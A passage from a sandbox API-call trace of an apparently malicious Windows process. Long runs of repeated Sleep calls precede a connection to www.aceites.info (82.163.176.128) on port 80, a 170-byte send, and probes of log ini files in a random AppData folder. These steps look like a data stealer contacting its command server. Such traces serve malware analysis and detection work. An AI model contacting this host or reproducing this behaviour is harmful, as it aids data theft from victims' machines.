Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.215] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0208.215] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6c590) returned 1 [0208.215] Sleep (dwMilliseconds=0x7d0) [0208.216] Sleep (dwMilliseconds=0x7d0) [0208.220] Sleep (dwMilliseconds=0x7d0) [0208.223] Sleep (dwMilliseconds=0x7d0) [0208.224] Sleep (dwMilliseconds=0x7d0) [0208.226] Sleep (dwMilliseconds=0x7d0) [0208.228] Sleep (dwMilliseconds=0x7d0) [0208.230] Sleep (dwMilliseconds=0x7d0) [0208.231] Sleep (dwMilliseconds=0x7d0) [0208.233] Sleep (dwMilliseconds=0x7d0) [0208.235] Sleep (dwMilliseconds=0x7d0) [0208.244] Sleep (dwMilliseconds=0x7d0) [0208.247] Sleep (dwMilliseconds=0x7d0) [0208.249] Sleep (dwMilliseconds=0x7d0) [0208.251] Sleep (dwMilliseconds=0x7d0) [0208.253] Sleep (dwMilliseconds=0x7d0) [0208.256] Sleep (dwMilliseconds=0x7d0) [0208.257] Sleep (dwMilliseconds=0x7d0) [0208.259] Sleep (dwMilliseconds=0x7d0) [0208.263] Sleep (dwMilliseconds=0x7d0) [0208.265] Sleep (dwMilliseconds=0x7d0) [0208.266] Sleep (dwMilliseconds=0x7d0) [0208.267] Sleep (dwMilliseconds=0x7d0) [0208.269] Sleep (dwMilliseconds=0x7d0) [0208.270] Sleep (dwMilliseconds=0x7d0) [0208.272] Sleep (dwMilliseconds=0x7d0) [0208.273] Sleep (dwMilliseconds=0x7d0) [0208.275] Sleep (dwMilliseconds=0x7d0) [0208.276] Sleep (dwMilliseconds=0x7d0) [0208.278] Sleep (dwMilliseconds=0x7d0) [0208.280] Sleep (dwMilliseconds=0x7d0) [0208.281] Sleep (dwMilliseconds=0x7d0) [0208.282] Sleep (dwMilliseconds=0x7d0) [0208.284] Sleep (dwMilliseconds=0x7d0) [0208.296] Sleep (dwMilliseconds=0x7d0) [0208.299] Sleep (dwMilliseconds=0x7d0) [0208.300] Sleep (dwMilliseconds=0x7d0) [0208.301] Sleep (dwMilliseconds=0x7d0) [0208.303] Sleep (dwMilliseconds=0x7d0) [0208.305] Sleep (dwMilliseconds=0x7d0) [0208.306] Sleep (dwMilliseconds=0x7d0) [0208.308] Sleep (dwMilliseconds=0x7d0) [0208.310] Sleep (dwMilliseconds=0x7d0) [0208.311] Sleep (dwMilliseconds=0x7d0) [0208.351] Sleep (dwMilliseconds=0x7d0) [0208.353] Sleep (dwMilliseconds=0x7d0) [0208.355] Sleep (dwMilliseconds=0x7d0) [0208.357] Sleep (dwMilliseconds=0x7d0) [0208.358] Sleep (dwMilliseconds=0x7d0) [0208.359] Sleep (dwMilliseconds=0x7d0) [0208.361] Sleep (dwMilliseconds=0x7d0) [0208.363] Sleep (dwMilliseconds=0x7d0) [0208.365] Sleep (dwMilliseconds=0x7d0) [0208.366] Sleep (dwMilliseconds=0x7d0) [0208.368] Sleep (dwMilliseconds=0x7d0) [0208.370] Sleep (dwMilliseconds=0x7d0) [0208.371] Sleep (dwMilliseconds=0x7d0) [0208.373] Sleep (dwMilliseconds=0x7d0) [0208.375] Sleep (dwMilliseconds=0x7d0) [0208.377] Sleep (dwMilliseconds=0x7d0) [0208.378] Sleep (dwMilliseconds=0x7d0) [0208.380] Sleep (dwMilliseconds=0x7d0) [0208.381] Sleep (dwMilliseconds=0x7d0) [0208.382] Sleep (dwMilliseconds=0x7d0) [0208.384] Sleep (dwMilliseconds=0x7d0) [0208.385] Sleep (dwMilliseconds=0x7d0) [0208.388] Sleep (dwMilliseconds=0x7d0) [0208.389] Sleep (dwMilliseconds=0x7d0) [0208.391] Sleep (dwMilliseconds=0x7d0) [0208.392] Sleep (dwMilliseconds=0x7d0) [0208.394] Sleep (dwMilliseconds=0x7d0) [0208.395] Sleep (dwMilliseconds=0x7d0) [0208.396] Sleep (dwMilliseconds=0x7d0) [0208.398] Sleep (dwMilliseconds=0x7d0) [0208.399] Sleep (dwMilliseconds=0x7d0) [0208.401] Sleep (dwMilliseconds=0x7d0) [0208.402] Sleep (dwMilliseconds=0x7d0) [0208.404] Sleep (dwMilliseconds=0x7d0) [0208.405] Sleep (dwMilliseconds=0x7d0) [0208.407] Sleep (dwMilliseconds=0x7d0) [0208.410] Sleep (dwMilliseconds=0x7d0) [0208.411] Sleep (dwMilliseconds=0x7d0) [0208.413] Sleep (dwMilliseconds=0x7d0) [0208.415] Sleep (dwMilliseconds=0x7d0) [0208.417] Sleep (dwMilliseconds=0x7d0) [0208.419] Sleep (dwMilliseconds=0x7d0) [0208.423] Sleep (dwMilliseconds=0x7d0) [0208.424] Sleep (dwMilliseconds=0x7d0) [0208.426] Sleep (dwMilliseconds=0x7d0) [0208.427] Sleep (dwMilliseconds=0x7d0) [0208.429] Sleep (dwMilliseconds=0x7d0) [0208.430] Sleep (dwMilliseconds=0x7d0) [0208.432] Sleep (dwMilliseconds=0x7d0) [0208.433] Sleep (dwMilliseconds=0x7d0) [0208.435] Sleep (dwMilliseconds=0x7d0) [0208.436] Sleep (dwMilliseconds=0x7d0) [0208.438] Sleep (dwMilliseconds=0x7d0) [0208.439] Sleep (dwMilliseconds=0x7d0) [0208.441] Sleep (dwMilliseconds=0x7d0) [0208.442] Sleep (dwMilliseconds=0x7d0) [0208.444] Sleep (dwMilliseconds=0x7d0) [0208.445] Sleep (dwMilliseconds=0x7d0) [0208.447] Sleep (dwMilliseconds=0x7d0) [0208.448] Sleep (dwMilliseconds=0x7d0) [0208.450] Sleep (dwMilliseconds=0x7d0) [0208.451] Sleep (dwMilliseconds=0x7d0) [0208.453] Sleep (dwMilliseconds=0x7d0) [0208.454] Sleep (dwMilliseconds=0x7d0) [0208.456] Sleep (dwMilliseconds=0x7d0) [0208.457] Sleep (dwMilliseconds=0x7d0) [0208.459] Sleep (dwMilliseconds=0x7d0) [0208.460] Sleep (dwMilliseconds=0x7d0) [0208.462] Sleep (dwMilliseconds=0x7d0) [0208.463] Sleep (dwMilliseconds=0x7d0) [0208.465] Sleep (dwMilliseconds=0x7d0) [0208.466] Sleep (dwMilliseconds=0x7d0) [0208.468] Sleep (dwMilliseconds=0x7d0) [0208.469] Sleep (dwMilliseconds=0x7d0) [0208.471] Sleep (dwMilliseconds=0x7d0) [0208.472] Sleep (dwMilliseconds=0x7d0) [0208.474] Sleep (dwMilliseconds=0x7d0) [0208.475] Sleep (dwMilliseconds=0x7d0) [0208.477] Sleep (dwMilliseconds=0x7d0) [0208.478] Sleep (dwMilliseconds=0x7d0) [0208.480] Sleep (dwMilliseconds=0x7d0) [0208.481] Sleep (dwMilliseconds=0x7d0) [0208.483] Sleep (dwMilliseconds=0x7d0) [0208.484] Sleep (dwMilliseconds=0x7d0) [0208.486] Sleep (dwMilliseconds=0x7d0) [0208.487] Sleep (dwMilliseconds=0x7d0) [0208.489] Sleep (dwMilliseconds=0x7d0) [0208.490] Sleep (dwMilliseconds=0x7d0) [0208.492] Sleep (dwMilliseconds=0x7d0) [0208.493] Sleep (dwMilliseconds=0x7d0) [0208.495] Sleep (dwMilliseconds=0x7d0) [0208.496] Sleep (dwMilliseconds=0x7d0) [0208.498] Sleep (dwMilliseconds=0x7d0) [0208.499] Sleep (dwMilliseconds=0x7d0) [0208.501] Sleep (dwMilliseconds=0x7d0) [0208.502] Sleep (dwMilliseconds=0x7d0) [0208.505] Sleep (dwMilliseconds=0x7d0) [0208.507] Sleep (dwMilliseconds=0x7d0) [0208.508] Sleep (dwMilliseconds=0x7d0) [0208.510] Sleep (dwMilliseconds=0x7d0) [0208.511] Sleep (dwMilliseconds=0x7d0) [0208.513] Sleep (dwMilliseconds=0x7d0) [0208.516] Sleep (dwMilliseconds=0x7d0) [0208.518] Sleep (dwMilliseconds=0x7d0) [0208.519] Sleep (dwMilliseconds=0x7d0) [0208.521] Sleep (dwMilliseconds=0x7d0) [0208.522] Sleep (dwMilliseconds=0x7d0) [0208.524] Sleep (dwMilliseconds=0x7d0) [0208.525] Sleep (dwMilliseconds=0x7d0) [0208.527] Sleep (dwMilliseconds=0x7d0) [0208.530] Sleep (dwMilliseconds=0x7d0) [0208.531] Sleep (dwMilliseconds=0x7d0) [0208.532] Sleep (dwMilliseconds=0x7d0) [0208.534] Sleep (dwMilliseconds=0x7d0) [0208.535] Sleep (dwMilliseconds=0x7d0) [0208.537] Sleep (dwMilliseconds=0x7d0) [0208.538] Sleep (dwMilliseconds=0x7d0) [0208.540] Sleep (dwMilliseconds=0x7d0) [0208.541] Sleep (dwMilliseconds=0x7d0) [0208.543] Sleep (dwMilliseconds=0x7d0) [0208.544] Sleep (dwMilliseconds=0x7d0) [0208.546] Sleep (dwMilliseconds=0x7d0) [0208.547] Sleep (dwMilliseconds=0x7d0) [0208.549] Sleep (dwMilliseconds=0x7d0) [0208.551] Sleep (dwMilliseconds=0x7d0) [0208.552] Sleep (dwMilliseconds=0x7d0) [0208.554] Sleep (dwMilliseconds=0x7d0) [0208.555] Sleep (dwMilliseconds=0x7d0) [0208.557] Sleep (dwMilliseconds=0x7d0) [0208.558] Sleep (dwMilliseconds=0x7d0) [0208.561] Sleep (dwMilliseconds=0x7d0) [0208.590] Sleep (dwMilliseconds=0x7d0) [0208.591] Sleep (dwMilliseconds=0x7d0) [0208.594] Sleep (dwMilliseconds=0x7d0) [0208.597] Sleep (dwMilliseconds=0x7d0) [0208.599] Sleep (dwMilliseconds=0x7d0) [0208.600] Sleep (dwMilliseconds=0x7d0) [0208.602] Sleep (dwMilliseconds=0x7d0) [0208.605] Sleep (dwMilliseconds=0x7d0) [0208.607] Sleep (dwMilliseconds=0x7d0) [0208.609] Sleep (dwMilliseconds=0x7d0) [0208.611] Sleep (dwMilliseconds=0x7d0) [0208.613] Sleep (dwMilliseconds=0x7d0) [0208.615] Sleep (dwMilliseconds=0x7d0) [0208.616] Sleep (dwMilliseconds=0x7d0) [0208.618] Sleep (dwMilliseconds=0x7d0) [0208.619] Sleep (dwMilliseconds=0x7d0) [0208.621] Sleep (dwMilliseconds=0x7d0) [0208.622] Sleep (dwMilliseconds=0x7d0) [0208.624] Sleep (dwMilliseconds=0x7d0) [0208.625] Sleep (dwMilliseconds=0x7d0) [0208.627] Sleep (dwMilliseconds=0x7d0) [0208.628] Sleep (dwMilliseconds=0x7d0) [0208.630] Sleep (dwMilliseconds=0x7d0) [0208.631] Sleep (dwMilliseconds=0x7d0) [0208.633] Sleep (dwMilliseconds=0x7d0) [0208.634] Sleep (dwMilliseconds=0x7d0) [0208.636] Sleep (dwMilliseconds=0x7d0) [0208.637] Sleep (dwMilliseconds=0x7d0) [0208.639] Sleep (dwMilliseconds=0x7d0) [0208.640] Sleep (dwMilliseconds=0x7d0) [0208.642] Sleep (dwMilliseconds=0x7d0) [0208.643] Sleep (dwMilliseconds=0x7d0) [0208.645] Sleep (dwMilliseconds=0x7d0) [0208.646] Sleep (dwMilliseconds=0x7d0) [0208.648] Sleep (dwMilliseconds=0x7d0) [0208.649] Sleep (dwMilliseconds=0x7d0) [0208.651] Sleep (dwMilliseconds=0x7d0) [0208.652] Sleep (dwMilliseconds=0x7d0) [0208.654] Sleep (dwMilliseconds=0x7d0) [0208.655] Sleep (dwMilliseconds=0x7d0) [0208.657] Sleep (dwMilliseconds=0x7d0) [0208.658] Sleep (dwMilliseconds=0x7d0) [0208.660] Sleep (dwMilliseconds=0x7d0) [0208.661] Sleep (dwMilliseconds=0x7d0) [0208.663] Sleep (dwMilliseconds=0x7d0) [0208.664] Sleep (dwMilliseconds=0x7d0) [0208.666] Sleep (dwMilliseconds=0x7d0) [0208.667] Sleep (dwMilliseconds=0x7d0) [0208.669] Sleep (dwMilliseconds=0x7d0) [0208.670] Sleep (dwMilliseconds=0x7d0) [0208.672] Sleep (dwMilliseconds=0x7d0) [0208.673] Sleep (dwMilliseconds=0x7d0) [0208.675] Sleep (dwMilliseconds=0x7d0) [0208.676] Sleep (dwMilliseconds=0x7d0) [0208.678] Sleep (dwMilliseconds=0x7d0) [0208.680] Sleep (dwMilliseconds=0x7d0) [0208.681] Sleep (dwMilliseconds=0x7d0) [0208.683] Sleep (dwMilliseconds=0x7d0) [0208.685] Sleep (dwMilliseconds=0x7d0) [0208.686] Sleep (dwMilliseconds=0x7d0) [0208.688] Sleep (dwMilliseconds=0x7d0) [0208.690] Sleep (dwMilliseconds=0x7d0) [0208.691] Sleep (dwMilliseconds=0x7d0) [0208.693] Sleep (dwMilliseconds=0x7d0) [0208.694] Sleep (dwMilliseconds=0x7d0) [0208.697] Sleep (dwMilliseconds=0x7d0) [0208.698] Sleep (dwMilliseconds=0x7d0) [0208.700] Sleep (dwMilliseconds=0x7d0) [0208.701] Sleep (dwMilliseconds=0x7d0) [0208.704] Sleep (dwMilliseconds=0x7d0) [0208.705] Sleep (dwMilliseconds=0x7d0) [0208.707] Sleep (dwMilliseconds=0x7d0) [0208.708] Sleep (dwMilliseconds=0x7d0) [0208.710] Sleep (dwMilliseconds=0x7d0) [0208.711] Sleep (dwMilliseconds=0x7d0) [0208.714] Sleep (dwMilliseconds=0x7d0) [0208.715] Sleep (dwMilliseconds=0x7d0) [0208.717] Sleep (dwMilliseconds=0x7d0) [0208.718] Sleep (dwMilliseconds=0x7d0) [0208.720] Sleep (dwMilliseconds=0x7d0) [0208.721] Sleep (dwMilliseconds=0x7d0) [0208.723] Sleep (dwMilliseconds=0x7d0) [0208.724] Sleep (dwMilliseconds=0x7d0) [0208.726] Sleep (dwMilliseconds=0x7d0) [0208.727] Sleep (dwMilliseconds=0x7d0) [0208.729] Sleep (dwMilliseconds=0x7d0) [0208.730] Sleep (dwMilliseconds=0x7d0) [0208.732] Sleep (dwMilliseconds=0x7d0) [0208.734] Sleep (dwMilliseconds=0x7d0) [0208.735] Sleep (dwMilliseconds=0x7d0) [0208.737] Sleep (dwMilliseconds=0x7d0) [0208.738] Sleep (dwMilliseconds=0x7d0) [0208.740] Sleep (dwMilliseconds=0x7d0) [0208.741] Sleep (dwMilliseconds=0x7d0) [0208.743] Sleep (dwMilliseconds=0x7d0) [0208.744] Sleep (dwMilliseconds=0x7d0) [0208.746] Sleep (dwMilliseconds=0x7d0) [0208.747] Sleep (dwMilliseconds=0x7d0) [0208.749] Sleep (dwMilliseconds=0x7d0) [0208.765] Sleep (dwMilliseconds=0x7d0) [0208.767] Sleep (dwMilliseconds=0x7d0) [0208.768] Sleep (dwMilliseconds=0x7d0) [0208.770] Sleep (dwMilliseconds=0x7d0) [0208.774] Sleep (dwMilliseconds=0x7d0) [0208.775] Sleep (dwMilliseconds=0x7d0) [0208.777] Sleep (dwMilliseconds=0x7d0) [0208.778] Sleep (dwMilliseconds=0x7d0) [0208.780] Sleep (dwMilliseconds=0x7d0) [0208.781] Sleep (dwMilliseconds=0x7d0) [0208.783] Sleep (dwMilliseconds=0x7d0) [0208.784] Sleep (dwMilliseconds=0x7d0) [0208.786] Sleep (dwMilliseconds=0x7d0) [0208.787] Sleep (dwMilliseconds=0x7d0) [0208.789] Sleep (dwMilliseconds=0x7d0) [0208.791] Sleep (dwMilliseconds=0x7d0) [0208.792] Sleep (dwMilliseconds=0x7d0) [0208.794] Sleep (dwMilliseconds=0x7d0) [0208.795] Sleep (dwMilliseconds=0x7d0) [0208.797] Sleep (dwMilliseconds=0x7d0) [0208.798] Sleep (dwMilliseconds=0x7d0) [0208.800] Sleep (dwMilliseconds=0x7d0) [0208.801] Sleep (dwMilliseconds=0x7d0) [0208.803] Sleep (dwMilliseconds=0x7d0) [0208.805] Sleep (dwMilliseconds=0x7d0) [0208.806] Sleep (dwMilliseconds=0x7d0) [0208.808] Sleep (dwMilliseconds=0x7d0) [0208.809] Sleep (dwMilliseconds=0x7d0) [0208.811] Sleep (dwMilliseconds=0x7d0) [0208.812] Sleep (dwMilliseconds=0x7d0) [0208.815] Sleep (dwMilliseconds=0x7d0) [0208.818] Sleep (dwMilliseconds=0x7d0) [0208.824] Sleep (dwMilliseconds=0x7d0) [0208.825] Sleep (dwMilliseconds=0x7d0) [0208.827] Sleep (dwMilliseconds=0x7d0) [0208.828] Sleep (dwMilliseconds=0x7d0) [0208.830] Sleep (dwMilliseconds=0x7d0) [0208.831] Sleep (dwMilliseconds=0x7d0) [0208.833] Sleep (dwMilliseconds=0x7d0) [0208.836] Sleep (dwMilliseconds=0x7d0) [0208.837] Sleep (dwMilliseconds=0x7d0) [0208.840] Sleep (dwMilliseconds=0x7d0) [0208.842] Sleep (dwMilliseconds=0x7d0) [0208.843] Sleep (dwMilliseconds=0x7d0) [0208.845] Sleep (dwMilliseconds=0x7d0) [0208.846] Sleep (dwMilliseconds=0x7d0) [0208.848] Sleep (dwMilliseconds=0x7d0) [0208.849] Sleep (dwMilliseconds=0x7d0) [0208.851] Sleep (dwMilliseconds=0x7d0) [0208.852] Sleep (dwMilliseconds=0x7d0) [0208.854] Sleep (dwMilliseconds=0x7d0) [0208.855] Sleep (dwMilliseconds=0x7d0) [0208.857] Sleep (dwMilliseconds=0x7d0) [0208.861] Sleep (dwMilliseconds=0x7d0) [0208.862] Sleep (dwMilliseconds=0x7d0) [0208.864] Sleep (dwMilliseconds=0x7d0) [0208.865] Sleep (dwMilliseconds=0x7d0) [0208.867] Sleep (dwMilliseconds=0x7d0) [0208.868] Sleep (dwMilliseconds=0x7d0) [0208.870] Sleep (dwMilliseconds=0x7d0) [0208.871] Sleep (dwMilliseconds=0x7d0) [0208.873] Sleep (dwMilliseconds=0x7d0) [0208.874] Sleep (dwMilliseconds=0x7d0) [0208.876] Sleep (dwMilliseconds=0x7d0) [0208.878] Sleep (dwMilliseconds=0x7d0) [0208.880] Sleep (dwMilliseconds=0x7d0) [0208.881] Sleep (dwMilliseconds=0x7d0) [0208.883] Sleep (dwMilliseconds=0x7d0) [0208.884] Sleep (dwMilliseconds=0x7d0) [0208.886] Sleep (dwMilliseconds=0x7d0) [0208.887] Sleep (dwMilliseconds=0x7d0) [0208.889] Sleep (dwMilliseconds=0x7d0) [0208.890] Sleep (dwMilliseconds=0x7d0) [0208.892] Sleep (dwMilliseconds=0x7d0) [0208.893] Sleep (dwMilliseconds=0x7d0) [0208.895] Sleep (dwMilliseconds=0x7d0) [0208.896] Sleep (dwMilliseconds=0x7d0) [0208.898] Sleep (dwMilliseconds=0x7d0) [0208.901] Sleep (dwMilliseconds=0x7d0) [0208.902] Sleep (dwMilliseconds=0x7d0) [0208.904] Sleep (dwMilliseconds=0x7d0) [0208.905] Sleep (dwMilliseconds=0x7d0) [0208.907] Sleep (dwMilliseconds=0x7d0) [0208.908] Sleep (dwMilliseconds=0x7d0) [0208.910] Sleep (dwMilliseconds=0x7d0) [0208.911] Sleep (dwMilliseconds=0x7d0) [0208.913] Sleep (dwMilliseconds=0x7d0) [0208.914] Sleep (dwMilliseconds=0x7d0) [0208.916] Sleep (dwMilliseconds=0x7d0) [0208.917] Sleep (dwMilliseconds=0x7d0) [0208.919] Sleep (dwMilliseconds=0x7d0) [0208.921] Sleep (dwMilliseconds=0x7d0) [0208.923] Sleep (dwMilliseconds=0x7d0) [0208.924] Sleep (dwMilliseconds=0x7d0) [0208.926] Sleep (dwMilliseconds=0x7d0) [0208.927] Sleep (dwMilliseconds=0x7d0) [0208.929] Sleep (dwMilliseconds=0x7d0) [0208.930] Sleep (dwMilliseconds=0x7d0) [0208.932] Sleep (dwMilliseconds=0x7d0) [0208.933] Sleep (dwMilliseconds=0x7d0) [0208.935] Sleep (dwMilliseconds=0x7d0) [0208.955] Sleep (dwMilliseconds=0x7d0) [0209.054] socket (af=2, type=1, protocol=6) returned 0x2034 [0209.054] getaddrinfo (in: pNodeName="www.aceites.info", pServiceName="80", pHints=0x9e75258*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e75288 | out: ppResult=0x9e75288*=0xa05ecd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f93290*(sa_family=2, sin_port=0x50, sin_addr="82.163.176.128"), ai_next=0x0)) returned 0 [0209.253] connect (s=0x2034, name=0x9f93290*(sa_family=2, sin_port=0x50, sin_addr="82.163.176.128"), namelen=16) returned 0 [0209.295] send (s=0x2034, buf=0x82e10fa*, len=170, flags=0) returned 170 [0209.296] setsockopt (s=0x2034, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0209.296] recv (in: s=0x2034, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040) returned -1 [0209.797] closesocket (s=0x2034) returned 0 [0209.797] Sleep (dwMilliseconds=0x7d0) [0209.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.799] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.799] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0209.799] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.799] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.799] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0209.799] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.799] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.800] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0209.800] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.800] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.800] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.800] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0209.800] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.800] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.800] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.800] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0209.800] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.800] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.800] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.801] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: 